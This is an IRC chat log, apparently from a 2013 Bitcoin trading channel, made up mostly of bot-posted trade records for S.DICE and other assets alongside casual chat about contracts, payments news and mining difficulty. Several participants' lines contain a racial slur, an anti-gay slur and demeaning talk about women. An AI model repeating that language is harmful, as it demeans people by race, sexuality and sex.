@ 0.00475106 = 10.3526 BTC [+] Jan 15 23:13:12 oh wow Jan 15 23:15:37 [HAVELOCK] [SDICE] 10 @ 0.48 = 4.8 BTC [-] Jan 15 23:19:23 mircea_popescu: doesn't sound far fetched at all Jan 15 23:20:01 dub what that ? Jan 15 23:20:35 I suppose you're still not going to claim them tho? =/ Jan 15 23:20:52 a contract with the manufacturer that they don't get paid if its not delivered Jan 15 23:21:14 dub manufacturer yes. the thread looks like it's about the desginer team. Jan 15 23:21:50 Namworld you think 50 btc or w/e it is changes my mind about stuff like submitting us taxids ?! Jan 15 23:21:59 lots of things I work on are more punitive, ie we start paying penalties for late delivery as well as not getting paid Jan 15 23:22:19 dub but they're all commodified i bet. Jan 15 23:22:38 It doesn't require US tax ID but eh Jan 15 23:25:32 anyway. no, nothing's changed. Jan 15 23:25:57 Would have thought so. Jan 15 23:26:02 im talking things that need design/build to be delivered Jan 15 23:27:56 similar situation, customer wants x to do y in z, a project arises to achieve it funded by the promise of its success Jan 15 23:30:46 really ?! Jan 15 23:30:52 failure is a, not uncommon, calculated risk Jan 15 23:30:56 well, i never heard of it, myself. Jan 15 23:31:04 i guess our worlds never met. Jan 15 23:32:34 one spectacular project failure in recent years resulted in a $50m writeoff Jan 15 23:35:04 [MPEX] [S.DICE] 1550 @ 0.00475106 = 7.3641 BTC [+] Jan 15 23:35:16 just what was spent on land/kit/ip for a build out before deciding it wasn't going to return capital Jan 15 23:36:46 [MPEX] [S.DICE] 3075 @ 0.00475106 = 14.6095 BTC [+] Jan 15 23:36:48 [MPEX] [S.DICE] 71 @ 0.00475111 = 0.3373 BTC [+] Jan 15 23:39:09 http://news.cnet.com/8301-1035_3-57563963-94/with-gobank-you-can-carry-all-your-money-in-a-pocket/ Jan 15 23:39:34 That wasted money would have been better spent on my little selfish person... 50 million... Jan 15 23:41:27 http://trilema.com/2013/the-one-person-id-like-to-meet/ Jan 15 23:41:31 its pocket change really Jan 15 23:42:33 that was just a pilot for what would have cost a billion+ Jan 15 23:44:54 They should run a pilot project on wether if they give me 50 million, I'll have 50 million. Jan 15 23:45:02 they're still falling over each other with this non-bitcoin online payments thing ? Jan 15 23:45:12 YES Jan 15 23:45:15 apparently Jan 15 23:45:20 Feel free to burn them Jan 15 23:46:16 what's the point even Jan 15 23:46:25 like the new and improved horse carriage, cca 1910 Jan 15 23:47:59 but with a new carriage compnay though Jan 15 23:48:10 [MPEX] [S.DICE] 1900 @ 0.00475111 = 9.0271 BTC [+] Jan 15 23:48:45 a bmw carriage Jan 15 23:49:32 would kick all ass too. if i was ceo of bmw i'd totally do that Jan 15 23:49:42 unveil a horsedrawn carriage at the 2013 whatever expo Jan 15 23:50:05 i'd buy one Jan 15 23:50:13 i need a horse Jan 15 23:50:30 I'd scrap all the BMWs and resell toyota Jan 15 23:50:41 far superior Jan 15 23:50:43 i wouldn't buy a toyota. Jan 15 23:50:56 thats because you have never driven a car Jan 15 23:51:01 hahaha possibly. Jan 15 23:51:08 in fact i've never bought anything other than germanz. Jan 15 23:51:16 if you own a horse and a plow you can probably grow your own food to Jan 15 23:51:17 mircea would do this: http://www.flickr.com/photos/cookiesound/7387458292/sizes/l/in/photostream/ Jan 15 23:51:28 or grow lots of your own food Jan 15 23:51:31 lol Jan 15 23:51:37 with dudes tho ?! Jan 15 23:51:56 with bitches ofc Jan 15 23:52:05 i'd drive the carriage Jan 15 23:52:13 haha Jan 15 23:52:34 i've seen them firsthand on vienna pride 2012.. lovely Jan 15 23:53:46 there's a dude in californioa doing this for years Jan 15 23:53:52 with girls. Jan 15 23:54:20 urlpls Jan 15 23:55:24 [BTCTC] [BTC-BOND] 77 @ 0.01 = 0.77 BTC [+] Jan 15 23:55:26 [MPEX] [S.DICE] 200 @ 0.00470888 = 0.9418 BTC [-] Jan 15 23:56:08 mmm Jan 15 23:56:55 [BTCTC] [SYNERGY] 1 @ 0.13 BTC Jan 15 23:57:46 http://upload.wikimedia.org/wikipedia/commons/1/11/Ponygirl_folsom2005.jpg liek Jan 16 00:00:54 bah Jan 16 00:01:12 [BTCTC] [SYNERGY] 1 @ 0.1613 BTC [+] Jan 16 00:01:15 so a week or so ago - was it a week jurov ? - i was dealing with people rounding off the last two digits Jan 16 00:01:21 now they're sending whole btc ;/ Jan 16 00:01:27 i dunno who is the attention whore on that last pic Jan 16 00:01:47 [MPEX] [S.DICE] 578 @ 0.00468969 = 2.7106 BTC [-] Jan 16 00:01:49 [MPEX] [S.DICE] 2418 @ 0.00466509 = 11.2802 BTC [-] Jan 16 00:01:50 [MPEX] [S.DICE] 619 @ 0.00465692 = 2.8826 BTC [-] Jan 16 00:02:23 [BTCTC] [ESECURITYSABTC] 8 @ 0.79 = 6.32 BTC [-] Jan 16 00:02:49 yeah pregenerated disposable addys ftw Jan 16 00:03:29 no. reading faqs ftw. Jan 16 00:03:46 nobody does that. Jan 16 00:03:50 its silly to expect. Jan 16 00:03:56 free money, can't argue with that. Jan 16 00:10:19 [MPEX] [S.DICE] 2300 @ 0.00470888 = 10.8304 BTC [+] Jan 16 00:10:22 [MPEX] [S.DICE] 1483 @ 0.00475108 = 7.0459 BTC [+] Jan 16 00:13:24 [MPEX] [S.DICE] 2200 @ 0.00475108 = 10.4524 BTC [+] Jan 16 00:24:27 yes, noreadingfags Jan 16 00:30:50 [MPEX] [S.DICE] 117 @ 0.00465692 = 0.5449 BTC [-] Jan 16 00:30:52 [MPEX] [S.DICE] 1100 @ 0.00463 = 5.093 BTC [-] Jan 16 00:30:53 [MPEX] [S.DICE] 483 @ 0.00462501 = 2.2339 BTC [-] Jan 16 00:32:07 Aaaaaand - filled Jan 16 00:32:14 http://25.media.tumblr.com/tumblr_m85jzb5Fsc1rqh6xjo1_500.jpg Jan 16 00:33:45 Half negress posing as soldier, what's so special about it? Jan 16 00:34:43 special ? nothing's special, what are you, a romantic ? Jan 16 00:35:08 im just saving it here for when vrag shows up Jan 16 00:35:22 too funny Jan 16 00:35:23 [MPEX] [S.DICE] 450 @ 0.00470759 = 2.1184 BTC [+] Jan 16 00:41:09 [MPEX] [S.DICE] 727 @ 0.00475101 = 3.454 BTC [+] Jan 16 00:42:23 [MPEX] [S.DICE] 3066 @ 0.00471989 = 14.4712 BTC [-] Jan 16 00:42:25 [MPEX] [S.DICE] 2817 @ 0.00470759 = 13.2613 BTC [-] Jan 16 00:57:11 this is funny, my book is almost equally divided calls/puts. Jan 16 00:57:18 so... stable prices ? Jan 16 01:00:56 [MPEX] [S.DICE] 2233 @ 0.00470759 = 10.512 BTC [-] Jan 16 01:03:14 [MPEX] [S.DICE] 4850 @ 0.0046602 = 22.602 BTC [-] Jan 16 01:09:08 ;;ticker Jan 16 01:09:08 BTCUSD ticker | Best bid: 14.29004, Best ask: 14.34998, Bid-ask spread: 0.05994, Last trade: 14.29004, 24 hour volume: 51477.40480267, 24 hour low: 13.99178, 24 hour high: 14.47899, 24 hour vwap: 14.20207 Jan 16 01:17:04 [MPEX] [S.DICE] 822 @ 0.0046602 = 3.8307 BTC [-] Jan 16 01:17:06 [MPEX] [S.DICE] 3567 @ 0.00467875 = 16.6891 BTC [+] Jan 16 01:22:21 [MPEX] [S.DICE] 3150 @ 0.00463188 = 14.5904 BTC [-] Jan 16 01:22:23 [MPEX] [S.DICE] 1350 @ 0.00462501 = 6.2438 BTC [-] Jan 16 01:32:56 [MPEX] [S.DICE] 417 @ 0.00462501 = 1.9286 BTC [-] Jan 16 01:33:02 [MPEX] [S.DICE] 1183 @ 0.00462455 = 5.4708 BTC [-] Jan 16 01:39:08 [MPEX] [S.DICE] 1200 @ 0.00463216 = 5.5586 BTC [+] Jan 16 01:44:37 [MPEX] [S.DICE] 3450 @ 0.00462455 = 15.9547 BTC [-] Jan 16 02:04:08 [MPEX] [S.DICE] 2100 @ 0.00463216 = 9.7275 BTC [+] Jan 16 02:05:42 [MPEX] [S.DICE] 1900 @ 0.00463216 = 8.8011 BTC [+] Jan 16 02:11:33 [BTCTC] [GSDPT] 77 @ 0.0047 = 0.3619 BTC [+] Jan 16 02:12:46 [BTCTC] [BASIC-MINING] 18 @ 0.33 = 5.94 BTC [+] Jan 16 02:21:47 [MPEX] [S.DICE] 2200 @ 0.0046278 = 10.1812 BTC [-] Jan 16 02:21:49 [MPEX] [S.DICE] 550 @ 0.00463216 = 2.5477 BTC [+] Jan 16 02:21:50 [MPEX] [S.DICE] 2048 @ 0.00463483 = 9.4921 BTC [+] Jan 16 02:21:52 [MPEX] [S.DICE] 2 @ 0.00463807 = 0.0093 BTC [+] Jan 16 02:25:27 [MPEX] [S.DICE] 432 @ 0.00462458 = 1.9978 BTC [-] Jan 16 02:25:29 [MPEX] [S.DICE] 2086 @ 0.00462455 = 9.6468 BTC [-] Jan 16 02:38:01 !ticker mp s.dice Jan 16 02:38:02 [MPEX:S.DICE] 1D: 0.00449484 / 0.00467464 / 0.00475112 (528892 shares, 2,472.38 BTC), 7D: 0.00449034 / 0.00466731 / 0.0048 (1978804 shares, 9,235.70 BTC), 30D: 0.0014 / 0.00361629 / 0.0048 (11800824 shares, 42,675.25 BTC) Jan 16 02:38:14 !ticker mp s.mpoe Jan 16 02:38:15 [MPEX:S.MPOE] 1D: 0.00063095 / 0.00065714 / 0.00066 (348511 shares, 229.02 BTC), 7D: 0.00062769 / 0.00065782 / 0.00066 (6823379 shares, 4,488.62 BTC), 30D: 0.00058738 / 0.00063615 / 0.00066 (43800018 shares, 27,863.71 BTC) Jan 16 02:51:47 [MPEX] [S.DICE] 432 @ 0.00463803 = 2.0036 BTC [+] Jan 16 02:51:49 [MPEX] [S.DICE] 8676 @ 0.00463807 = 40.2399 BTC [+] Jan 16 02:57:02 http://25.media.tumblr.com/b2332320a0ebc78c9047aff229002ae5/tumblr_mgntro9m3X1ql2603o1_500.jpg Jan 16 03:08:20 anyone remember how the gribble diff calc works ? Jan 16 03:08:23 ;;bc,diff 135 Jan 16 03:08:24 3249549.5844872 Jan 16 03:08:30 ;;bc,calc 135 Jan 16 03:08:30 use the 'gentime' command instead Jan 16 03:08:36 ;;gentime 135 Jan 16 03:08:37 The average time to generate a block at 135.0 Mhps, given difficulty of 3249549.58449, is 3 years, 14 weeks, 3 days, 13 hours, 56 minutes, and 48 seconds Jan 16 03:09:28 ;;gentime 135000 Jan 16 03:09:29 The average time to generate a block at 135000.0 Mhps, given difficulty of 3249549.58449, is 1 day, 4 hours, 43 minutes, and 4 seconds Jan 16 03:10:04 [MPEX] [S.DICE] 500 @ 0.00463806 = 2.319 BTC [-] Jan 16 03:10:06 [MPEX] [S.DICE] 200 @ 0.00463807 = 0.9276 BTC [+] Jan 16 03:26:46 [BTCTC] [BTC-BOND] 598 @ 0.0099 = 5.9202 BTC [-] Jan 16 03:27:14 [MPEX] [S.DICE] 432 @ 0.00463086 = 2.0005 BTC [-] Jan 16 03:27:16 [MPEX] [S.DICE] 2218 @ 0.00463081 = 10.2711 BTC [-] Jan 16 03:31:23 [MPEX] [S.DICE] 432 @ 0.00463802 = 2.0036 BTC [+] Jan 16 03:31:25 [MPEX] [S.DICE] 568 @ 0.00463806 = 2.6344 BTC [+] Jan 16 03:32:58 from the forum, turn on subtitles: http://www.youtube.com/watch?feature=player_embedded&v=C4SnUObMd0o Jan 16 03:33:36 [MPEX] [S.DICE] 432 @ 0.00463082 = 2.0005 BTC [-] Jan 16 03:33:36 [MPEX] [S.DICE] 932 @ 0.00463081 = 4.3159 BTC [-] Jan 16 03:33:38 [MPEX] [S.DICE] 231 @ 0.00462455 = 1.0683 BTC [-] Jan 16 03:33:42 [MPEX] [S.DICE] 60 @ 0.00462455 = 0.2775 BTC [-] Jan 16 03:33:44 [MPEX] [S.DICE] 645 @ 0.00462281 = 2.9817 BTC [-] Jan 16 03:34:35 this subtitles trend... i like it! Jan 16 03:36:06 ahahah Jan 16 03:36:47 hey, is that filmned in belgrade ? Jan 16 03:37:05 just pasted from the forum Jan 16 03:37:27 that looks like one of the nicer spots, towards the park. Jan 16 03:39:18 [MPEX] [S.DICE] 432 @ 0.00462286 = 1.9971 BTC [+] Jan 16 03:39:20 [MPEX] [S.DICE] 868 @ 0.00462281 = 4.0126 BTC [-] Jan 16 03:42:48 [MPEX] [S.DICE] 432 @ 0.00463802 = 2.0036 BTC [+] Jan 16 03:42:49 [MPEX] [S.DICE] 182 @ 0.00463806 = 0.8441 BTC [+] Jan 16 03:42:51 [MPEX] [S.DICE] 1654 @ 0.00463807 = 7.6714 BTC [+] Jan 16 03:44:20 [BTCTC] [ESECURITYSABTC] 8 @ 0.79 = 6.32 BTC [-] Jan 16 03:44:22 [BTCTC] [ESECURITYSABTC] 10 @ 0.84 = 8.4 BTC [+] Jan 16 03:44:23 [BTCTC] [ESECURITYSABTC] 2 @ 0.849 = 1.698 BTC [+] Jan 16 03:49:47 [BTCTC] [GSDPT] 2 @ 0.0047 = 0.0094 BTC [+] Jan 16 03:59:45 [MPEX] [S.DICE] 432 @ 0.00463804 = 2.0036 BTC [-] Jan 16 03:59:47 [MPEX] [S.DICE] 168 @ 0.00463807 = 0.7792 BTC [+] Jan 16 03:59:48 [MPEX] [S.DICE] 1200 @ 0.00466124 = 5.5935 BTC [+] Jan 16 03:59:49 [MPEX] [S.DICE] 1088 @ 0.00466698 = 5.0777 BTC [+] Jan 16 04:07:37 [MPEX] [S.DICE] 1049 @ 0.00466698 = 4.8957 BTC [+] Jan 16 04:07:39 [MPEX] [S.DICE] 333 @ 0.00467875 = 1.558 BTC [+] Jan 16 04:07:40 [MPEX] [S.DICE] 518 @ 0.00469272 = 2.4308 BTC [+] Jan 16 04:12:00 [MPEX] [S.DICE] 2800 @ 0.00469272 = 13.1396 BTC [+] Jan 16 04:22:04 [MPEX] [S.DICE] 432 @ 0.00463464 = 2.0022 BTC [-] Jan 16 04:22:05 [MPEX] [S.DICE] 1468 @ 0.00463459 = 6.8036 BTC [-] Jan 16 04:24:04 [MPEX] [S.DICE] 432 @ 0.00463462 = 2.0022 BTC [+] Jan 16 04:24:06 [MPEX] [S.DICE] 432 @ 0.0046346 = 2.0021 BTC [-] Jan 16 04:24:06 [MPEX] [S.DICE] 582 @ 0.00463459 = 2.6973 BTC [-] Jan 16 04:24:08 [MPEX] [S.DICE] 4 @ 0.00462285 = 0.0185 BTC [-] Jan 16 04:27:03 [MPEX] [S.DICE] 432 @ 0.0046229 = 1.9971 BTC [+] Jan 16 04:27:05 [MPEX] [S.DICE] 861 @ 0.00462285 = 3.9803 BTC [-] Jan 16 04:27:06 [MPEX] [S.DICE] 1537 @ 0.00462281 = 7.1053 BTC [-] Jan 16 04:27:07 [MPEX] [S.DICE] 370 @ 0.00461942 = 1.7092 BTC [-] Jan 16 04:38:58 [MPEX] [S.DICE] 2050 @ 0.00463655 = 9.5049 BTC [+] Jan 16 04:39:00 [MPEX] [S.DICE] 2880 @ 0.00461942 = 13.3039 BTC [-] Jan 16 04:39:01 [MPEX] [S.DICE] 2270 @ 0.00461489 = 10.4758 BTC [-] Jan 16 04:44:26 [MPEX] [S.DICE] 432 @ 0.0046927 = 2.0272 BTC [+] Jan 16 04:44:28 [MPEX] [S.DICE] 3678 @ 0.00469272 = 17.2598 BTC [+] Jan 16 04:44:29 [MPEX] [S.DICE] 705 @ 0.004695 = 3.31 BTC [+] Jan 16 04:47:40 [MPEX] [S.DICE] 432 @ 0.0046149 = 1.9936 BTC [-] Jan 16 04:47:41 [MPEX] [S.DICE] 930 @ 0.00461489 = 4.2918 BTC [-] Jan 16 04:47:42 [MPEX] [S.DICE] 88 @ 0.00460968 = 0.4057 BTC [-] Jan 16 04:50:44 ;;bc,stats Jan 16 04:50:46 Current Blocks: 216716 | Current Difficulty: 3249549.5844872 | Next Difficulty At Block: 217727 | Next Difficulty In: 1011 blocks | Next Difficulty In About: 1 week, 0 days, 17 hours, 21 minutes, and 0 seconds | Next Difficulty Estimate: 2958271.49649687 | Estimated Percent Change: -8.96364497347 Jan 16 05:07:00 [MPEX] [S.DICE] 1931 @ 0.00460968 = 8.9013 BTC [-] Jan 16 05:07:01 [MPEX] [S.DICE] 4069 @ 0.00460366 = 18.7323 BTC [-] Jan 16 05:07:03 [MPEX] [S.DICE] 1470 @ 0.00459927 = 6.7609 BTC [-] Jan 16 05:10:50 [MPEX] [S.MPOE] 726 @ 0.0006546 = 0.4752 BTC [-] Jan 16 05:10:52 [MPEX] [S.MPOE] 29110 @ 0.00065459 = 19.0551 BTC [-] Jan 16 05:10:53 [MPEX] [S.MPOE] 4264 @ 0.00065363 = 2.7871 BTC [-] Jan 16 05:46:48 [MPEX] [S.DICE] 1824 @ 0.00459927 = 8.3891 BTC [-] Jan 16 05:55:52 http://www.zerohedge.com/news/2013-01-14/it-begins-bundesbank-commence-repatriating-gold-new-york-fed Jan 16 05:55:57 and so it begins. Jan 16 05:57:14 [MPEX] [S.DICE] 510 @ 0.00465394 = 2.3735 BTC [+] Jan 16 05:57:16 [MPEX] [S.DICE] 432 @ 0.0046543 = 2.0107 BTC [+] Jan 16 05:57:17 [MPEX] [S.DICE] 432 @ 0.0046543 = 2.0107 BTC [+] Jan 16 05:57:19 [MPEX] [S.DICE] 1800 @ 0.00465431 = 8.3778 BTC [+] Jan 16 05:57:19 [MPEX] [S.DICE] 624 @ 0.00465996 = 2.9078 BTC [+] Jan 16 05:57:20 [MPEX] [S.DICE] 545 @ 0.004695 = 2.5588 BTC [+] Jan 16 05:57:21 [MPEX] [S.DICE] 1500 @ 0.00470171 = 7.0526 BTC [+] Jan 16 05:57:22 [MPEX] [S.DICE] 698 @ 0.00470707 = 3.2855 BTC [+] Jan 16 06:13:04 [MPEX] [S.DICE] 1100 @ 0.00460113 = 5.0612 BTC [-] Jan 16 06:13:06 [MPEX] [S.DICE] 1200 @ 0.00465223 = 5.5827 BTC [+] Jan 16 06:13:07 [MPEX] [S.DICE] 427 @ 0.00470707 = 2.0099 BTC [+] Jan 16 06:13:09 [MPEX] [S.DICE] 1467 @ 0.00471289 = 6.9138 BTC [+] Jan 16 06:18:03 [MPEX] [S.DICE] 432 @ 0.00459928 = 1.9869 BTC [-] Jan 16 06:18:05 [MPEX] [S.DICE] 1384 @ 0.00459927 = 6.3654 BTC [-] Jan 16 06:18:06 [MPEX] [S.DICE] 1082 @ 0.00459916 = 4.9763 BTC [-] Jan 16 06:18:07 [MPEX] [S.DICE] 600 @ 0.00459239 = 2.7554 BTC [-] Jan 16 06:18:09 [MPEX] [S.DICE] 172 @ 0.00459179 = 0.7898 BTC [-] Jan 16 06:34:31 wtf is this Jan 16 06:34:37 buy 50 btcworth, sell 50 btc worth Jan 16 06:38:02 [MPEX] [S.DICE] 432 @ 0.0046523 = 2.0098 BTC [+] Jan 16 06:38:04 [MPEX] [S.DICE] 618 @ 0.00465229 = 2.8751 BTC [-] Jan 16 06:47:18 http://trilema.com/2013/bitcoin-wins-more-bundesbank-will-deutsches-gold-zuruckholen/ Jan 16 06:49:18 [MPEX] [S.DICE] 1182 @ 0.00465229 = 5.499 BTC [-] Jan 16 06:49:20 [MPEX] [S.DICE] 2118 @ 0.00459179 = 9.7254 BTC [-] Jan 16 06:51:34 [MPEX] [S.DICE] 432 @ 0.00471286 = 2.036 BTC [+] Jan 16 06:51:36 [MPEX] [S.DICE] 1568 @ 0.00471289 = 7.3898 BTC [+] Jan 16 06:57:37 [BTCTC] [GSDPT] 1 @ 0.0047 BTC [+] Jan 16 06:58:15 [MPEX] [S.DICE] 432 @ 0.00471284 = 2.0359 BTC [-] Jan 16 06:58:17 [MPEX] [S.DICE] 432 @ 0.00471286 = 2.036 BTC [+] Jan 16 06:58:17 [MPEX] [S.DICE] 432 @ 0.00471286 = 2.036 BTC [+] Jan 16 06:58:18 [MPEX] [S.DICE] 1240 @ 0.00471289 = 5.844 BTC [+] Jan 16 06:58:20 [MPEX] [S.DICE] 1414 @ 0.00471489 = 6.6669 BTC [+] Jan 16 06:59:05 [MPEX] [S.DICE] 2000 @ 0.00471489 = 9.4298 BTC [+] Jan 16 07:03:43 [MPEX] [S.DICE] 432 @ 0.00469631 = 2.0288 BTC [-] Jan 16 07:03:45 [MPEX] [S.DICE] 168 @ 0.00469628 = 0.789 BTC [-] Jan 16 07:09:15 [MPEX] [S.DICE] 432 @ 0.00471487 = 2.0368 BTC [+] Jan 16 07:09:16 [MPEX] [S.DICE] 636 @ 0.00471489 = 2.9987 BTC [+] Jan 16 07:09:18 [MPEX] [S.DICE] 2900 @ 0.00472584 = 13.7049 BTC [+] Jan 16 07:09:19 [MPEX] [S.DICE] 600 @ 0.00473143 = 2.8389 BTC [+] Jan 16 07:15:38 [MPEX] [S.DICE] 432 @ 0.00469633 = 2.0288 BTC [-] Jan 16 07:15:40 [MPEX] [S.DICE] 2382 @ 0.00469628 = 11.1865 BTC [-] Jan 16 07:20:22 [BTCTC] [COGNITIVE] 1 @ 0.41 BTC [-] Jan 16 07:20:24 [BTCTC] [COGNITIVE] 10 @ 0.41 = 4.1 BTC [-] Jan 16 07:20:54 [BTCTC] [COGNITIVE] 1 @ 0.4061 BTC [-] Jan 16 07:20:55 [BTCTC] [COGNITIVE] 13 @ 0.406 = 5.278 BTC [-] Jan 16 07:20:57 [BTCTC] [COGNITIVE] 6 @ 0.403 = 2.418 BTC [-] Jan 16 07:22:16 [BTCTC] [COGNITIVE] 1 @ 0.449 BTC [+] Jan 16 07:23:33 [MPEX] [S.DICE] 336 @ 0.0046911 = 1.5762 BTC [-] Jan 16 07:23:40 [MPEX] [S.DICE] 1000 @ 0.00471486 = 4.7149 BTC [+] Jan 16 07:23:42 [MPEX] [S.DICE] 1364 @ 0.00473143 = 6.4537 BTC [+] Jan 16 07:30:29 [MPEX] [S.DICE] 432 @ 0.00464762 = 2.0078 BTC [-] Jan 16 07:30:31 [MPEX] [S.DICE] 432 @ 0.00464762 = 2.0078 BTC [-] Jan 16 07:30:33 [MPEX] [S.DICE] 1236 @ 0.00464758 = 5.7444 BTC [-] Jan 16 07:38:48 [BTCTC] [BASIC-MINING] 3 @ 0.301 = 0.903 BTC [-] Jan 16 07:38:50 [BTCTC] [BASIC-MINING] 40 @ 0.3 = 12 BTC [-] Jan 16 07:40:39 http://trilema.com/2013/sbvps-delisting-notice/ Jan 16 07:40:47 S.BVPS to be delisted, Feb 15th Jan 16 07:43:55 [MPEX] [S.MPOE] 19850 @ 0.00065364 = 12.9748 BTC [+] Jan 16 07:43:57 [MPEX] [S.MPOE] 27836 @ 0.00065363 = 18.1944 BTC [-] Jan 16 07:44:02 [MPEX] [S.MPOE] 6414 @ 0.00065135 = 4.1778 BTC [-] Jan 16 07:49:44 mircea_popescu is trying to push Namjiies into using the rota one way or another ;) Jan 16 07:49:46 [BTCTC] [RSM] 1 @ 0.006 BTC [-] Jan 16 07:49:53 lol Jan 16 07:51:04 [BTCTC] [BASIC-MINING] 33 @ 0.3299 = 10.8867 BTC [+] Jan 16 07:52:30 no... I wanted to stick around but eh Jan 16 07:52:41 [MPEX] [S.DICE] 432 @ 0.0047077 = 2.0337 BTC [+] Jan 16 07:52:42 [MPEX] [S.DICE] 2100 @ 0.00470774 = 9.8863 BTC [+] Jan 16 07:52:52 [MPEX] [S.DICE] 2700 @ 0.0047133 = 12.7259 BTC [+] Jan 16 07:52:55 [MPEX] [S.DICE] 3436 @ 0.00473143 = 16.2572 BTC [+] Jan 16 07:52:55 [MPEX] [S.DICE] 1580 @ 0.00473148 = 7.4757 BTC [+] Jan 16 07:53:00 [MPEX] [S.DICE] 4000 @ 0.00474996 = 18.9998 BTC [+] Jan 16 07:53:06 [MPEX] [S.DICE] 5670 @ 0.00474999 = 26.9324 BTC [+] Jan 16 07:53:08 [MPEX] [S.DICE] 3670 @ 0.00475002 = 17.4326 BTC [+] Jan 16 07:53:09 [MPEX] [S.DICE] 9990 @ 0.00475009 = 47.4534 BTC [+] Jan 16 07:53:14 [MPEX] [S.DICE] 373 @ 0.00475101 = 1.7721 BTC [+] Jan 16 07:53:18 My copartners weren't too enthusiastic. I managed to convince them on a new contract, but we're real turtles Jan 16 07:53:20 [MPEX] [S.DICE] 3317 @ 0.00475108 = 15.7593 BTC [+] Jan 16 07:53:21 [MPEX] [S.DICE] 3029 @ 0.00475111 = 14.3911 BTC [+] Jan 16 07:53:23 [MPEX] [S.DICE] 4328 @ 0.00475112 = 20.5628 BTC [+] Jan 16 07:53:24 [MPEX] [S.DICE] 4027 @ 0.00475112 = 19.1328 BTC [+] Jan 16 07:53:25 [MPEX] [S.DICE] 229 @ 0.00475127 = 1.088 BTC [+] Jan 16 07:53:26 [MPEX] [S.DICE] 2200 @ 0.00475193 = 10.4542 BTC [+] Jan 16 07:53:27 [MPEX] [S.DICE] 1000 @ 0.00475247 = 4.7525 BTC [+] Jan 16 07:53:28 [MPEX] [S.DICE] 1700 @ 0.00475614 = 8.0854 BTC [+] Jan 16 07:53:29 [MPEX] [S.DICE] 1585 @ 0.00475625 = 7.5387 BTC [+] Jan 16 07:53:31 [MPEX] [S.DICE] 3006 @ 0.00475847 = 14.304 BTC [+] Jan 16 07:53:33 [MPEX] [S.DICE] 1050 @ 0.00475908 = 4.997 BTC [+] Jan 16 07:53:38 [MPEX] [S.DICE] 4450 @ 0.00475914 = 21.1782 BTC [+] Jan 16 07:53:44 [MPEX] [S.DICE] 20000 @ 0.00476 = 95.2 BTC [+] Jan 16 07:53:59 [MPEX] [S.DICE] 3800 @ 0.00476002 = 18.0881 BTC [+] Jan 16 07:54:05 Well with rg's previous violations too, no financial statements plus neglect. Jan 16 07:54:06 [MPEX] [S.DICE] 5200 @ 0.0047614 = 24.7593 BTC [+] Jan 16 07:54:06 [MPEX] [S.DICE] 3300 @ 0.00476203 = 15.7147 BTC [+] Jan 16 07:54:07 [MPEX] [S.DICE] 1855 @ 0.00476745 = 8.8436 BTC [+] Jan 16 07:54:09 [MPEX] [S.DICE] 7187 @ 0.00476839 = 34.2704 BTC [+] Jan 16 07:54:10 [MPEX] [S.DICE] 350 @ 0.00476914 = 1.6692 BTC [+] Jan 16 07:54:14 [MPEX] [S.DICE] 4050 @ 0.00477094 = 19.3223 BTC [+] Jan 16 07:54:20 [MPEX] [S.DICE] 2950 @ 0.00477199 = 14.0774 BTC [+] Jan 16 07:54:21 [MPEX] [S.DICE] 1056 @ 0.00477363 = 5.041 BTC [+] Jan 16 07:54:21 Guess we're not up to MPEx's standards. Jan 16 07:54:22 [MPEX] [S.DICE] 1700 @ 0.00477406 = 8.1159 BTC [+] Jan 16 07:54:32 [MPEX] [S.DICE] 529 @ 0.00477469 = 2.5258 BTC [+] Jan 16 07:54:34 [MPEX] [S.DICE] 1938 @ 0.00477525 = 9.2544 BTC [+] Jan 16 07:54:34 [MPEX] [S.DICE] 1650 @ 0.00477533 = 7.8793 BTC [+] Jan 16 07:54:40 [MPEX] [S.DICE] 1400 @ 0.00477577 = 6.6861 BTC [+] Jan 16 07:54:46 [MPEX] [S.DICE] 1200 @ 0.00477619 = 5.7314 BTC [+] Jan 16 07:54:47 [MPEX] [S.DICE] 2782 @ 0.00477922 = 13.2958 BTC [+] Jan 16 07:54:52 [MPEX] [S.DICE] 1250 @ 0.00477933 = 5.9742 BTC [+] Jan 16 07:54:54 [MPEX] [S.DICE] 1200 @ 0.00478196 = 5.7384 BTC [+] Jan 16 07:54:55 [MPEX] [S.DICE] 1224 @ 0.00478275 = 5.8541 BTC [+] Jan 16 07:55:00 [MPEX] [S.DICE] 3550 @ 0.00478339 = 16.981 BTC [+] Jan 16 07:55:02 [MPEX] [S.DICE] 1550 @ 0.0047848 = 7.4164 BTC [+] Jan 16 07:55:03 [MPEX] [S.DICE] 2050 @ 0.00478494 = 9.8091 BTC [+] Jan 16 07:55:07 [MPEX] [S.DICE] 850 @ 0.00478529 = 4.0675 BTC [+] Jan 16 07:55:09 [MPEX] [S.DICE] 4700 @ 0.00478529 = 22.4909 BTC [+] Jan 16 07:55:10 [MPEX] [S.DICE] 1366 @ 0.0047853 = 6.5367 BTC [+] Jan 16 07:55:20 [MPEX] [S.DICE] 1370 @ 0.0047887 = 6.5605 BTC [+] Jan 16 07:55:22 [MPEX] [S.DICE] 1089 @ 0.00479075 = 5.2171 BTC [+] Jan 16 07:55:28 [MPEX] [S.DICE] 1405 @ 0.00479079 = 6.7311 BTC [+] Jan 16 07:55:30 [MPEX] [S.DICE] 739 @ 0.00479383 = 3.5426 BTC [+] Jan 16 07:55:33 [MPEX] [S.DICE] 3800 @ 0.00479515 = 18.2216 BTC [+] Jan 16 07:55:35 [MPEX] [S.DICE] 163 @ 0.00479613 = 0.7818 BTC [+] Jan 16 07:55:36 [MPEX] [S.DICE] 4532 @ 0.00479624 = 21.7366 BTC [+] Jan 16 07:55:38 [MPEX] [S.DICE] 1800 @ 0.00479836 = 8.637 BTC [+] Jan 16 07:55:39 [MPEX] [S.DICE] 2150 @ 0.00479859 = 10.317 BTC [+] Jan 16 07:55:40 [MPEX] [S.DICE] 4071 @ 0.00479887 = 19.5362 BTC [+] Jan 16 07:55:41 [MPEX] [S.DICE] 3300 @ 0.00479891 = 15.8364 BTC [+] Jan 16 07:55:43 [MPEX] [S.DICE] 2504 @ 0.00479944 = 12.0178 BTC [+] Jan 16 07:55:44 [MPEX] [S.DICE] 249513 @ 0.0048 = 1197.6624 BTC [+] Jan 16 07:55:45 [MPEX] [S.DICE] 2100 @ 0.00480255 = 10.0854 BTC [+] Jan 16 07:55:46 [MPEX] [S.DICE] 1100 @ 0.00480415 = 5.2846 BTC [+] Jan 16 07:55:47 [MPEX] [S.DICE] 823 @ 0.00480454 = 3.9541 BTC [+] Jan 16 07:55:48 [MPEX] [S.DICE] 1126 @ 0.00480477 = 5.4102 BTC [+] Jan 16 07:55:51 [MPEX] [S.DICE] 770 @ 